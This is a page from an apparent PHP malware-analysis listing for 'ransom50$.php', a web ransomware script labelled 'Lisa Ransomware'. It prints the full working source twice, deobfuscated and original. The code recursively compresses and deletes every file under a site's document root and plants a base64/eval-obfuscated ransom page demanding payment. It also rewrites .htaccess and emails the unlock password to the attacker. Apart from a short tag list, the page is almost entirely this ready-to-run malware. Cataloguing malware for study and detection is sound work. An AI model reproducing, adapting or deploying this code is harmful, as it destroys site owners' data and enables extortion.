PHP Malware Analysis

Back to list

Filename: ransom50$.php

Tags

Encoding
  • base64_decode
  • base64_encode
URLs
Emails
  • mymail@gmail.com
Title
  • Ransomware
Execution
  • eval
Input
  • _POST
Environment
  • set_time_limit
  • error_reporting
Files
  • file_get_contents
  • file_put_contents
  • copy

Deobfuscated code

<!-- Created By : Lisa -->
<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->
<!-- © 2019 -->
<!-- Downloaded From: https://shell.prinsh.com -->

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://i.pinimg.com/originals/1e/e2/d9/1ee2d95ac0d53cd78fd004984993dfeb.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php 
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if (isset($_POST['pass'])) {
    function encfile($filename)
    {
        if (strpos($filename, '.crypt') !== false) {
            return;
        }
        file_put_contents($filename . ".crypt", gzdeflate(file_get_contents($filename), 9));
        unlink($filename);
        copy('.htaccess', '.htabackup');
        $file = "<title>Ransomware</title>\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->\n\n     <meta charset='utf-8'/>\n<meta content='IE=edge' http-equiv='X-UA-Compatible'/>\n<meta name=\"theme-color\"content=\"black\">\n<meta name=\"description\"content=\"hacked by \">\n<script src=\"https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js\" type=\"text/javascript\"></script>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\" />\n        <meta property=\"og:image\" content=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU\">\n        \n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\">\n<style>\nbody { \t \ndisplay: flex;\n  align-items: center;\n  justify-content: center;\n  min-height: 100vh;\nbackground-image: url(\"https://i.pinimg.com/originals/1e/e2/d9/1ee2d95ac0d53cd78fd004984993dfeb.gif\");\ncolor:pink;\n    height:100%;\n    background-position: center;\n    background-repeat: no-repeat;\nbackground-size: 100% 100%;\nbackground-attachment:fixed;} \t\nbtnn{\nalign-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\n}\n</style>\n<font color=\"pink\">\n<?php\nerror_reporting(0);\n\$input = \$_POST['pass'];\n\$pass = \"gomen\";\nif(isset(\$input)) {\nif(md5(\$input) == \$pass) {\nfunction decfile(\$filename){\n\tif (strpos(\$filename, '.crypt') === FALSE) {\n\treturn;\n\t}\n\t\$decrypted = gzinflate(file_get_contents(\$filename));\n\tfile_put_contents(str_replace('.crypt', '', \$filename), \$decrypted);\n\tunlink('crypt.php');\n\tunlink('.htaccess');\n\tunlink(\$filename);\n\techo \"\$filename Decrypted !!!<br>\";\n}\n\nfunction decdir(\$dir){\n\t\$files = array_diff(scandir(\$dir), array('.', '..'));\n\t\tforeach(\$files as \$file) {\n\t\t\tif(is_dir(\$dir.\"/\".\$file)){\n\t\t\t\tdecdir(\$dir.\"/\".\$file);\n\t\t\t}else {\n\t\t\t\tdecfile(\$dir.\"/\".\$file);\n\t\t}\n\t}\n}\n\ndecdir(\$_SERVER['DOCUMENT_ROOT']);\necho \"<br>Webroot Decrypted<br>\";\nunlink(\$_SERVER['PHP_SELF']);\nunlink('.htaccess');\ncopy('htabackup','.htaccess');\necho 'Success !!!';\n} else {\necho 'Failed Password !!!';\n}\nexit();\n}\n?>\n<center>\n<h1>Ransomware</h1>\n<br><br>\n<h3>Your Website Is Encrypted</h3>\n\n\nDon't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First\n<br>\nSend Me \$3 For Back Your Website <br><br>\n<br><br>\n<form enctype=\"multipart/form-data\" method=\"post\">\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->\n\n    <br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: cover;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"text\" name=\"pass\" placeholder=\"Password\">\n<br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"submit\" value=\"Decrypt\">\n    <br>\n       <center>\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->\n\n<br>\n<audio id=\"myAudio\" loop=\"1\">\n            <source src=\"\nhttps://nathanprinsley-files.prinsh.com/data-1/mp3/everything-i-need_skylar-grey.mp3\" type=\"audio/ogg\">\n            <source src=\"\nhttps://nathanprinsley-files.prinsh.com/data-1/mp3/everything-i-need_skylar-grey.mp3\" type=\"audio/mpeg\">\n        </audio>\n        <button onclick=\"playAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Play</button>       <button onclick=\"pauseAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Pause</button></center>\n        <script>\n              var x = document.getElementById(\"myAudio\"); \n\n              function playAudio() { \n                  x.play(); \n              } \n\n               function pauseAudio() { \n                  x.pause(); \n              } \n        </script>\n</form>\n<br>Contact Mail : mymail@gmail.com\n</font>\n<!-- Created By : Lisa -->\n<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->\n<!-- \xc2\xa9 2019 -->";
        $q = str_replace('gomen', md5($_POST['pass']), $file);
        $w = str_replace('mymail@gmail.com', $_POST['email'], $q);
        $e = str_replace('hello', $_POST['btc'], $w);
        $r = str_replace('$3', '$' . $_POST['price'], $e);
        $dec = $r;
        $comp = "<?php eval('?>'.base64_decode('" . base64_encode($dec) . "'" . ").'<?php '); ?>";
        $hii = fopen('index.php', 'w');
        fwrite($hii, $comp);
        fclose($hii);
        $hta = "DirectoryIndex index.php\n\r\nErrorDocument 403 /index.php\n\r\nErrorDocument 404 /index.php\n\r\nErrorDocument 500 /index.php\n";
        $ht = fopen('.htaccess', 'w');
        fwrite($ht, $hta);
        fclose($ht);
        echo "{$filename} Encrypted !!!<br>";
    }
    function encdir($dir)
    {
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . "/" . $file)) {
                encdir($dir . "/" . $file);
            } else {
                encfile($dir . "/" . $file);
            }
        }
    }
    if (isset($_POST['pass'])) {
        encdir($_SERVER['DOCUMENT_ROOT']);
    }
    copy('index.php', $_SERVER['DOCUMENT_ROOT'] . '/index.php');
    copy('.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htaccess');
    copy($_SERVER['DOCUMENT_ROOT'] . '.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htabackup');
    $to = $_POST['email'];
    $subject = 'Your Ransomware Info';
    $message = "Domain : " . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n\n" . "Your Password : " . $_POST['pass'];
    if (mail($to, $subject, $message)) {
        echo "The password has been sent to your email";
    } else {
        echo "password was not sent to your email";
    }
    exit;
}
?>
</html>
<?php 
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
?>
<center>
<h1>Lisa Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php 
echo $_SERVER['SCRIPT_FILENAME'];
?></font><br>
Mail Function : <font color="red"><?php 
if (mail('mymail@gmail.com', 'tes', 'tes')) {
    echo "ON";
} else {
    echo "OFF";
}
?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>
<!--Copyright © 2019--> 
<!-- Downloaded From: https://shell.prinsh.com -->


Original code

<!-- Created By : Lisa -->
<!-- JapanSec - SkullXploit - OtakuXploiter - OtakuCyberTeam -->
<!-- © 2019 -->
<!-- Downloaded From: https://shell.prinsh.com -->

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://i.pinimg.com/originals/1e/e2/d9/1ee2d95ac0d53cd78fd004984993dfeb.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if(isset($_POST['pass'])) {
function encfile($filename){
	if (strpos($filename, '.crypt') !== false) {
    return;
	}
	file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9));
	unlink($filename);
copy('.htaccess','.htabackup');
$file = base64_decode("PHRpdGxlPlJhbnNvbXdhcmU8L3RpdGxlPgo8IS0tIENyZWF0ZWQgQnkgOiBMaXNhIC0tPgo8IS0tIEphcGFuU2VjIC0gU2t1bGxYcGxvaXQgLSBPdGFrdVhwbG9pdGVyIC0gT3Rha3VDeWJlclRlYW0gLS0+CjwhLS0gwqkgMjAxOSAtLT4KCiAgICAgPG1ldGEgY2hhcnNldD0ndXRmLTgnLz4KPG1ldGEgY29udGVudD0nSUU9ZWRnZScgaHR0cC1lcXVpdj0nWC1VQS1Db21wYXRpYmxlJy8+CjxtZXRhIG5hbWU9InRoZW1lLWNvbG9yImNvbnRlbnQ9ImJsYWNrIj4KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iY29udGVudD0iaGFja2VkIGJ5ICI+CjxzY3JpcHQgc3JjPSJodHRwczovL2Nkbi5yYXdnaXQuY29tL2J1bmdmcmFuZ2tpL2VmZWtzYWxqdS8yYTc4MDVjNy9lZmVrLXNhbGp1LmpzIiB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPjwvc2NyaXB0PgogICAgICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSwgc2hyaW5rLXRvLWZpdD1ubyIgLz4KICAgICAgICA8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHBzOi8vZW5jcnlwdGVkLXRibjAuZ3N0YXRpYy5jb20vaW1hZ2VzP3E9dGJuOkFOZDlHY1RIaUZIc2VYRHozTHdLVUdiZ2lXa0txMEFxcnRrMFg2YTFWdyZ1c3FwPUNBVSI+CiAgICAgICAgCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvZm9udC1hd2Vzb21lLzQuNy4wL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyI+CjxzdHlsZT4KYm9keSB7IAkgCmRpc3BsYXk6IGZsZXg7CiAgYWxpZ24taXRlbXM6IGNlbnRlcjsKICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsKICBtaW4taGVpZ2h0OiAxMDB2aDsKYmFja2dyb3VuZC1pbWFnZTogdXJsKCJodHRwczovL2kucGluaW1nLmNvbS9vcmlnaW5hbHMvMWUvZTIvZDkvMWVlMmQ5NWFjMGQ1M2NkNzhmZDAwNDk4NDk5M2RmZWIuZ2lmIik7CmNvbG9yOnBpbms7CiAgICBoZWlnaHQ6MTAwJTsKICAgIGJhY2tncm91bmQtcG9zaXRpb246IGNlbnRlcjsKICAgIGJhY2tncm91bmQtcmVwZWF0OiBuby1yZXBlYXQ7CmJhY2tncm91bmQtc2l6ZTogMTAwJSAxMDAlOwpiYWNrZ3JvdW5kLWF0dGFjaG1lbnQ6Zml4ZWQ7fSAJCmJ0bm57CmFsaWduLWl0ZW1zOiBjZW50ZXI7CiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsKICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsKICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OwogICAgYm9yZGVyOiAxcHggc29saWQgZ3JlZW47CiAgICBsZXR0ZXItc3BhY2luZzogMHB4OwogICAgY29sb3I6IHJlZDsKICAgIHdpZHRoOiA2MHB4OwogICAgaGVpZ2h0OiAyNXB4OwogICAgcGFkZGluZzogMDsKICAgIGZvbnQtc2l6ZTogMTVweDsKICAgIGZvbnQtd2VpZ2h0OiBib2xkOwp9Cjwvc3R5bGU+Cjxmb250IGNvbG9yPSJwaW5rIj4KPD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwokaW5wdXQgPSAkX1BPU1RbJ3Bhc3MnXTsKJHBhc3MgPSAiZ29tZW4iOwppZihpc3NldCgkaW5wdXQpKSB7CmlmKG1kNSgkaW5wdXQpID09ICRwYXNzKSB7CmZ1bmN0aW9uIGRlY2ZpbGUoJGZpbGVuYW1lKXsKCWlmIChzdHJwb3MoJGZpbGVuYW1lLCAnLmNyeXB0JykgPT09IEZBTFNFKSB7CglyZXR1cm47Cgl9CgkkZGVjcnlwdGVkID0gZ3ppbmZsYXRlKGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlbmFtZSkpOwoJZmlsZV9wdXRfY29udGVudHMoc3RyX3JlcGxhY2UoJy5jcnlwdCcsICcnLCAkZmlsZW5hbWUpLCAkZGVjcnlwdGVkKTsKCXVubGluaygnY3J5cHQucGhwJyk7Cgl1bmxpbmsoJy5odGFjY2VzcycpOwoJdW5saW5rKCRmaWxlbmFtZSk7CgllY2hvICIkZmlsZW5hbWUgRGVjcnlwdGVkICEhITxicj4iOwp9CgpmdW5jdGlvbiBkZWNkaXIoJGRpcil7CgkkZmlsZXMgPSBhcnJheV9kaWZmKHNjYW5kaXIoJGRpciksIGFycmF5KCcuJywgJy4uJykpOwoJCWZvcmVhY2goJGZpbGVzIGFzICRmaWxlKSB7CgkJCWlmKGlzX2RpcigkZGlyLiIvIi4kZmlsZSkpewoJCQkJZGVjZGlyKCRkaXIuIi8iLiRmaWxlKTsKCQkJfWVsc2UgewoJCQkJZGVjZmlsZSgkZGlyLiIvIi4kZmlsZSk7CgkJfQoJfQp9CgpkZWNkaXIoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSk7CmVjaG8gIjxicj5XZWJyb290IERlY3J5cHRlZDxicj4iOwp1bmxpbmsoJF9TRVJWRVJbJ1BIUF9TRUxGJ10pOwp1bmxpbmsoJy5odGFjY2VzcycpOwpjb3B5KCdodGFiYWNrdXAnLCcuaHRhY2Nlc3MnKTsKZWNobyAnU3VjY2VzcyAhISEnOwp9IGVsc2UgewplY2hvICdGYWlsZWQgUGFzc3dvcmQgISEhJzsKfQpleGl0KCk7Cn0KPz4KPGNlbnRlcj4KPGgxPlJhbnNvbXdhcmU8L2gxPgo8YnI+PGJyPgo8aDM+WW91ciBXZWJzaXRlIElzIEVuY3J5cHRlZDwvaDM+CgoKRG9uJ3QgQ2hhbmdlIHRoZSBGaWxlbmFtZSBiZWNhdXNlIGl0IENhbiBEYW1hZ2UgdGhlIEZpbGUgSWYgWW91IFdhbnQgdG8gUmV0dXJuIFlvdSBNdXN0IEVudGVyIHRoZSBQYXNzd29yZCBGaXJzdAo8YnI+ClNlbmQgTWUgJDMgRm9yIEJhY2sgWW91ciBXZWJzaXRlIDxicj48YnI+Cjxicj48YnI+Cjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0icG9zdCI+CjwhLS0gQ3JlYXRlZCBCeSA6IExpc2EgLS0+CjwhLS0gSmFwYW5TZWMgLSBTa3VsbFhwbG9pdCAtIE90YWt1WHBsb2l0ZXIgLSBPdGFrdUN5YmVyVGVhbSAtLT4KPCEtLSDCqSAyMDE5IC0tPgoKICAgIDxicj4KPGlucHV0IHN0eWxlPSJhbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogY292ZXI7CiAgICBoZWlnaHQ6IDI1cHg7CiAgICBwYWRkaW5nOiAwOwogICAgZm9udC1zaXplOiAxNXB4OwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7IiB0eXBlPSJ0ZXh0IiBuYW1lPSJwYXNzIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPgo8YnI+CjxpbnB1dCBzdHlsZT0iYWxpZ24taXRlbXM6IGNlbnRlcjsKICAgIGp1c3RpZnktY29udGVudDogY2VudGVyOwogICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7CiAgICBib3JkZXI6IDFweCBzb2xpZCBncmVlbjsKICAgIGxldHRlci1zcGFjaW5nOiAwcHg7CiAgICBjb2xvcjogcmVkOwogICAgd2lkdGg6IDYwcHg7CiAgICBoZWlnaHQ6IDI1cHg7CiAgICBwYWRkaW5nOiAwOwogICAgZm9udC1zaXplOiAxNXB4OwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJEZWNyeXB0Ij4KICAgIDxicj4KICAgICAgIDxjZW50ZXI+CjwhLS0gQ3JlYXRlZCBCeSA6IExpc2EgLS0+CjwhLS0gSmFwYW5TZWMgLSBTa3VsbFhwbG9pdCAtIE90YWt1WHBsb2l0ZXIgLSBPdGFrdUN5YmVyVGVhbSAtLT4KPCEtLSDCqSAyMDE5IC0tPgoKPGJyPgo8YXVkaW8gaWQ9Im15QXVkaW8iIGxvb3A9IjEiPgogICAgICAgICAgICA8c291cmNlIHNyYz0iCmh0dHBzOi8vbmF0aGFucHJpbnNsZXktZmlsZXMucHJpbnNoLmNvbS9kYXRhLTEvbXAzL2V2ZXJ5dGhpbmctaS1uZWVkX3NreWxhci1ncmV5Lm1wMyIgdHlwZT0iYXVkaW8vb2dnIj4KICAgICAgICAgICAgPHNvdXJjZSBzcmM9IgpodHRwczovL25hdGhhbnByaW5zbGV5LWZpbGVzLnByaW5zaC5jb20vZGF0YS0xL21wMy9ldmVyeXRoaW5nLWktbmVlZF9za3lsYXItZ3JleS5tcDMiIHR5cGU9ImF1ZGlvL21wZWciPgogICAgICAgIDwvYXVkaW8+CiAgICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJwbGF5QXVkaW8oKSIgc3R5bGU9ImFsaWduLWl0ZW1zOiBjZW50ZXI7CiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsKICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsKICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OwogICAgYm9yZGVyOiAxcHggc29saWQgZ3JlZW47CiAgICBsZXR0ZXItc3BhY2luZzogMHB4OwogICAgY29sb3I6IHJlZDsKICAgIHdpZHRoOiA2MHB4OwogICAgaGVpZ2h0OiAyNXB4OwogICAgcGFkZGluZzogMDsKICAgIGZvbnQtc2l6ZTogMTVweDsKICAgIGZvbnQtd2VpZ2h0OiBib2xkOyIgdHlwZT0iYnV0dG9uIj5QbGF5PC9idXR0b24+ICAgICAgIDxidXR0b24gb25jbGljaz0icGF1c2VBdWRpbygpIiBzdHlsZT0iYWxpZ24taXRlbXM6IGNlbnRlcjsKICAgIGp1c3RpZnktY29udGVudDogY2VudGVyOwogICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7CiAgICBib3JkZXI6IDFweCBzb2xpZCBncmVlbjsKICAgIGxldHRlci1zcGFjaW5nOiAwcHg7CiAgICBjb2xvcjogcmVkOwogICAgd2lkdGg6IDYwcHg7CiAgICBoZWlnaHQ6IDI1cHg7CiAgICBwYWRkaW5nOiAwOwogICAgZm9udC1zaXplOiAxNXB4OwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7IiB0eXBlPSJidXR0b24iPlBhdXNlPC9idXR0b24+PC9jZW50ZXI+CiAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgICB2YXIgeCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJteUF1ZGlvIik7IAoKICAgICAgICAgICAgICBmdW5jdGlvbiBwbGF5QXVkaW8oKSB7IAogICAgICAgICAgICAgICAgICB4LnBsYXkoKTsgCiAgICAgICAgICAgICAgfSAKCiAgICAgICAgICAgICAgIGZ1bmN0aW9uIHBhdXNlQXVkaW8oKSB7IAogICAgICAgICAgICAgICAgICB4LnBhdXNlKCk7IAogICAgICAgICAgICAgIH0gCiAgICAgICAgPC9zY3JpcHQ+CjwvZm9ybT4KPGJyPkNvbnRhY3QgTWFpbCA6IG15bWFpbEBnbWFpbC5jb20KPC9mb250Pgo8IS0tIENyZWF0ZWQgQnkgOiBMaXNhIC0tPgo8IS0tIEphcGFuU2VjIC0gU2t1bGxYcGxvaXQgLSBPdGFrdVhwbG9pdGVyIC0gT3Rha3VDeWJlclRlYW0gLS0+CjwhLS0gwqkgMjAxOSAtLT4=");
$q = str_replace('gomen', md5($_POST['pass']), $file);
$w = str_replace('mymail@gmail.com', $_POST['email'], $q);
$e = str_replace('hello', $_POST['btc'], $w);
$r = str_replace('$3', '$'.$_POST['price'], $e);
$dec = $r;
$comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>";
$hii = fopen('index.php', 'w');
fwrite($hii, $comp);
fclose($hii);
$hta = "DirectoryIndex index.php\n
ErrorDocument 403 /index.php\n
ErrorDocument 404 /index.php\n
ErrorDocument 500 /index.php\n";
$ht = fopen('.htaccess', 'w');
fwrite($ht, $hta);
fclose($ht);
echo "$filename Encrypted !!!<br>";
}

function encdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				encdir($dir."/".$file);
			} else {
				encfile($dir."/".$file);
				
		}
	}
}

if(isset($_POST['pass'])){
	encdir($_SERVER['DOCUMENT_ROOT']);
}
copy('index.php', $_SERVER['DOCUMENT_ROOT'].'/index.php');
copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess');
copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup');
$to = $_POST['email'];
$subject = 'Your Ransomware Info';
$message = "Domain : ".$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']."\n\n"."Your Password : ".$_POST['pass'];
if(mail($to,$subject,$message)) {
echo 'The password has been sent to your email';
} else {
echo 'password was not sent to your email';
}
exit();
}
?>
</html>
<?php 
@ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8');


?>
<center>
<h1>Lisa Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br>
Mail Function : <font color="red"><?php if(mail('mymail@gmail.com','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>
<!--Copyright © 2019--> 
<!-- Downloaded From: https://shell.prinsh.com -->